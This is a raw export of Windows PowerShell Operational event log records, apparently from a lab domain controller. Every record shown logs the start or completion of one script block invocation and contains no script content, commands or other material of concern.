Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471665
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471664
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471663
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471662
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471661
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471660
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471659
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471658
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471657
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471656
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471655
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471654
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471653
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471652
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471651
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471650
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471649
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471648
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471647
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471646
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471645
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471644
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471643
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471642
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471641
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471640
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471639
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471638
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471637
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471636
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471635
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471634
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471633
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471632
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471631
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471630
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471629
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471628
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471627
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471626
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471625
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471624
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471623
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471622
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471621
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471620
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471619
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471618
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471617
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471616
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471615
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471614
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471613
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471612
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471611
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
